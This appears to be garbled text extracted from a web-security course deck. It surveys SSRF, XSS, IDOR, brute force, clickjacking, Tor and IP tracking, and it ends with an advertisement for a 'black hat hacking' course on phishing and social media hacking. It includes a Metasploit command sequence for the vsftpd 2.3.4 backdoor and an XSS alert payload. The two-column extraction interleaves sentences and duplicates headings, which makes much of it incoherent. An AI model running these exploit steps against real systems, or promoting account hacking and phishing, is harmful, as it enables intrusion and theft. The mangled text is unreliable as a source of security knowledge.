It is common to see applications containing SSRF
behavior together with defenses aimed at preventing
malicious exploitation. Often, these defenses can be
circumvented.
Server-side request forgery (also known as SSRF) is a
SSRF with blacklist-based input filter
web security vulnerability that allows an attacker to
Some applications only allow input that matches, begins
induce the server-side application to make HTTP with, or contains, a whitelist of permitted values. In this
requests to an arbitrary domain of the attacker's situation, you can sometimes circumvent the filter by
exploiting inconsistencies in URL parsing.
choosing.In a typical SSRF attack, the attacker might
cause the server to make a connection to internal-only SSRF with whitelist-based input filter
services within the organization's infrastructure. In Some applications only allow input that matches, begins
other cases, they may be able to force the server to with, or contains, a whitelist of permitted values. In this
situation, you can sometimes circumvent the filter by
connect to arbitrary external systems, potentially exploiting inconsistencies in URL parsing.
leaking sensitive data such as authorization Bypassing SSRF filters via open redirection
credentials. It is sometimes possible to circumvent any kind of
filter-based defenses by exploiting an open
redirection vulnerability
 Excessive trust in client-side controls
Why do applications behave in this way, and
implicitly trust requests that come from the
local machine? This can arise for various
reasons:
High-level logic vulnerability
It is common to see applications containing SSRF
behavior together with defenses aimed at preventing
malicious exploitation. Often, these defenses can be
circumvented.

Price Tampering Business logic Price

Vulnerabilities Vulnerabilities
Hence, web parameter tampering attack is possible In this section, we'll introduce the concept of business logic
by manipulating the price using a simple web proxy vulnerabilities and explain how they can arise due to flawed
tool (Tamper data, burpsuite etc.) or by editing the assumptions about user behavior. We'll discuss the potential
amount using the browser's web inspector tool. impact of logic flaws and teach you how they can be exploited. You
Notice the form field called price, which is flagged can also practice what you've learned using our interactive labs,
as hidden. which are based on real bugs that we've encountered in the wild.
Finally, we'll provide some general best practices to help you
prevent these kinds of logic flaws arising in your own applications.
 BRUTE FORCE ATTACK
A simple brute force attack uses automation and scripts to guess passwords. Typical brute force attacks make a few
hundred guesses every second. Simple passwords, such as those lacking a mix of upper- and lowercase letters and
those using common expressions like '123456' or 'password,' can be cracked in minutes.

All In One Attack

➢ In cryptography, a brute-force attack
consists of an attacker submitting many
passwords or passphrases with the hope of
eventually guessing correctly. The attacker
systematically checks all possible passwords
and passphrases until the correct one is
found.
 How does XSS work?
Cross-site scripting works by manipulating a vulnerable

CROSS SITE
web site so that it returns malicious JavaScript to users.
When the malicious code executes inside a victim's
browser, the attacker can fully compromise their
interaction with the application.

SCRIPTING (XSS)
Hence, web parameter tampering
XSS proof of concept
➢ You can confirm most kinds of XSS vulnerability by
injecting a payload that causes your own browser to execute
some arbitrary JavaScript. It's long been common practice
to use the alert() function for this purpose because it's
short, harmless, and pretty hard to miss when it's
attack is possible by manipulating successfully called. In fact, you solve the majority of our
XSS labs by invoking alert() in a simulated victim's browser.
the price using a simple web proxy
➢ Unfortunately, there's a slight hitch if you use Chrome.
tool (Tamper data, burpsuite etc.) or From version 92 onward (July 20th, 2021), cross-origin
iframes are prevented from calling alert(). As these are used
by editing the amount using the to construct some of the more advanced XSS attacks, you'll
sometimes need to use an alternative PoC payload. In this
browser's web inspector tool. Notice scenario, we recommend the print() function. If you're
interested in learning more about this change and why we
the form field called price, which is like print(),
flagged as hidden. ➢ As the simulated victim in our labs uses Chrome, we've
amended the affected labs so that they can also be solved
using print(). We've indicated this in the instructions
wherever relevant.
 Reflected cross-site scripting
➢ Reflected XSS is the simplest variety of cross-site
scripting. It arises when an application receives data in
an HTTP request and includes that data within the
immediate response in an unsafe way.

Stored cross-site scripting

➢ The data in question might be submitted to the
application via HTTP requests; for example, comments
on a blog post, user nicknames in a chat room, or contact
details on a customer order. In other cases, the data
might arrive from other untrusted sources;..

DOM-based cross-site scripting

What are the types ➢ In the following example, an application uses some

of XSS attacks? JavaScript to read the value from an input field and write
that value to an element within the HTML:

➢ Reflected XSS, where the malicious script comes from

the current HTTP request.

➢ Stored XSS, where the malicious script comes from <script>alert(1)</script>

the website's database.

➢ DOM-based XSS, where the vulnerability exists in

client-side code rather than server-side code.
 Reflected cross-site scripting
➢ Insecure direct object references (IDOR) are a type of
access control vulnerability that arises when an
application uses user-supplied input to access objects
directly. The term IDOR was popularized by its
appearance in the OWASP 2007 Top Ten. However, it is
just one example of many access control
implementation mistakes that can lead to access
controls being circumvented. IDOR vulnerabilities are
most commonly associated with horizontal privilege
escalation, but they can also arise in relation to vertical
privilege escalation.

Insecure Direct Object

Reference (IDOR)
➢ There are many examples of access control
vulnerabilities where usercontrolled parameter values
are used to access resources or functions directly
 Dirsearch : Directory Search
➢ Our next tool in the line is dirsearch. As the name
suggests it is a simple command-line tool that can be
used to brute force the directories. It is much faster than

FULL PATH the traditional DIRB:

DirBuster : Directory Search

➢ This project is a fork of the original DirBuster project.

DISCLOSURE (FPD)
The original DirBuster project is inactive. However,
OWASP ZAP team forked it and built a Forced Browse
add-on which can be loaded into ZAP. I have added the
necessary library files so that you can play with it
directly.
Full Path Disclosure (FPD) vulnerabilities enable the
attacker to see the path to the webroot/file. e.g.: DIRB: Web Fuzzer
/home/omg/htdocs/file/. Certain vulnerabilities, such as ➢ DIRB is a Web Content Scanner. It looks for existing
(and/or hidden) Web Objects. It basically works by
using the load_file() (within a SQL Injection) query to launching a dictionary based attack against a web server
view the page source, require the attacker to have the and analyzing the response.

full path to the file they wish to view.

 VSFTPD V2.3.4 BACKDOOR COMMAND
EXECUTION
This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was
introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most
recent information available. This backdoor was removed on July 3rd 2011.

FTP Exploit Reverse Shell FTP Exploit Metasploit

An exploit (from the English verb to exploit, ➢ msf > use exploit/unix/ftp/vsftpd_234_backdoor
meaning "to use something to one’s own ➢ msf exploit(vsftpd_234_backdoor) > show targets
advantage") is a piece of software, a chunk of data, ➢ ...targets...
or a sequence of commands that takes advantage ➢ msf exploit(vsftpd_234_backdoor) > set TARGET < target-id >
of a bug or vulnerability to cause unintended or ➢ msf exploit(vsftpd_234_backdoor) > show options
unanticipated behavior to occur on computer ➢ ...show and set options...
software, hardware, or something electronic ➢ msf exploit(vsftpd_234_backdoor) >
(usually computerized).[1] Such behavior ➢ exploit
frequently includes things like gaining control of a
computer system, allowing privilege escalation, or
a denial-of-service (DoS or related DDoS) attack.
 CLICKJACKING
Clickjacking is an interface-based attack in which a user is tricked into clicking on actionable
content on a hidden website by clicking on some other content in a decoy website. Consider the
following example:

Clickjacking Bug
Clickjacking is an attack that fools users into
thinking they are clicking on one thing when they
are actually clicking on another. Its other name,
user interface (UI) redressing, better describes
what is going on. Users think they are using a web
page’s normal UI, but in fact there is a hidden UI in
control; in other words, the UI has been redressed.
When users click something they think is safe, the
hidden UI performs a different action.

<iframe src="https://google.com"
width="800" height="800"></iframe>
 SSL | HTTPS | HOW TO SETUP
Secure Sockets Layer (SSL) is a security protocol that provides privacy, authentication, and
integrity to Internet communications. SSL eventually evolved into Transport Layer Security (TLS).

HTTP VS HTTPS

Http To HTTPS Website

In order to provide a high degree of
privacy, SSL encrypts data that is User Insecure Connection Normal HTTP
transmitted across the web. This means
that anyone who tries to intercept this
data will only see a garbled mix of
characters that is nearly impossible to
decrypt.

User Encrypted Connection Secure HTTPS

 WORDPRESS WEB APPLICATION FIREWALL (WAF)
The WordPress Firewall is a cloud-based WAF that stops website hacks and attacks. Our constant
research improves detection and mitigation of evolving threats, and you can add your own custom
rules.

Firewall Security Setup

➢ A Firewall is a network security device
that monitors and filters incoming and
outgoing network traffic based on an
organization's previously established
security policies. At its most basic, a
firewall is essentially the barrier that sits
between a private internal network and
the public Internet
 POC | PROOF OF CONCEPT | PIECE OF CODE
Proof of concept, also known as proof of principle, is a realization of a certain method or idea in
order to demonstrate its feasibility, or a demonstration in principle with the aim of verifying that
some concept or theory has practical potential. A proof of concept is usually small and may or may
not be complete.

Proof of Concept Piece of Code

Proof of concept, also known as proof of principle,
is a realization of a certain method or idea in order
to demonstrate its feasibility, or a demonstration
in principle with the aim of verifying that some
concept or theory has practical potential. A proof
of concept is usually small and may or may not be
complete.
 WEB RTC REAL-TIME COMMUNICATION
Anonymous Identity
WebRTC is supported by the following
browsers : Chrome, Opera, Edge, Firefox etc.
With WebRTC, you can add real-time communication

90%
capabilities to your application that works on top of an
open standard. It supports video, voice, and generic
data to be sent between peers, allowing developers to
build powerful voice- and video-communication
solutions. The technology is available on all modern
browsers as well as on native clients for all major
platforms.
There are many different use-cases for WebRTC, from basic web apps that
uses the camera or microphone, to more advanced video-calling
applications and screen sharing. We have gathered a number of code
samples to better illustrate how the technology works and what you can
use it for.
 IDENTITY SYSTEM
Browser Fingerprinting User Agent Browser
A device fingerprint or machine In computing, a user agent is any
fingerprint is information software, acting on behalf of a
Data Information
collected about the software user, which "retrieves, renders
and hardware of a remote and facilitates end-user
computing device for the interaction with Web content." A
purpose of identification. The user agent is therefore a special
information is usually Connect Alert kind of software agent. Some
assimilated into a brief identifier prominent examples of user
using a fingerprinting algorithm agents are web browsers and
email readers.
 TOR BROWSER
Anonymous Identity
Defend yourself
Tor Browser isolates each website you visit so third-
party trackers and ads can't follow you. Any cookies
automatically clear when you're done browsing. So
will your browsing history.

Tor Browser prevents someone watching your

connection from knowing what websites you visit.
All anyone monitoring your browsing habits can see
is that you're using Tor.
 LOCATION TRACKING
Location tracking refers to technologies that physically locate and electronically record and track
the movement of people or objects. Location tracking technology is in use every day with GPS
navigation, locations located on digital pictures and searching for businesses nearby using
common apps

c
IPLogger Canarytokens Find My Device
IP Logger is a URL Shortener with Canarytokens is a free tool that helps Find My Device easily lets you
advanced analytics for the traffic you discover you've been breached by remotely track, lock, and erase the
through your links, visitors on your having attackers announce data on a lost or stolen phone. You
blog, forum or website. With the help themselves. The tokens allow you to can also see the battery life remaining
of our services, you can find your IP implant traps on your phone and the Wi-Fi network
address, find location of IP address, it is connected to. There are other
and track the exa…. ways to track a lost Android phone,
CV DESIGN
** brief**
HOW APPLY FOR JOB IN
LINKEDIN
** brief**
 BLACK HAT HACKING
(BHH)
We have another very important course where you can learn black hat hacking
and take your skills a step further.

The topics of this course are:-

Broadband Internet Hacking
Facebook Database Access on
Dark Web | Tor Project
Social Media Hacking | Social
Engineering Attack Phishing
Hunting Breached Passwords

Register Now : Book Now

THANK YOU
W W W . D R O P . O R G . I N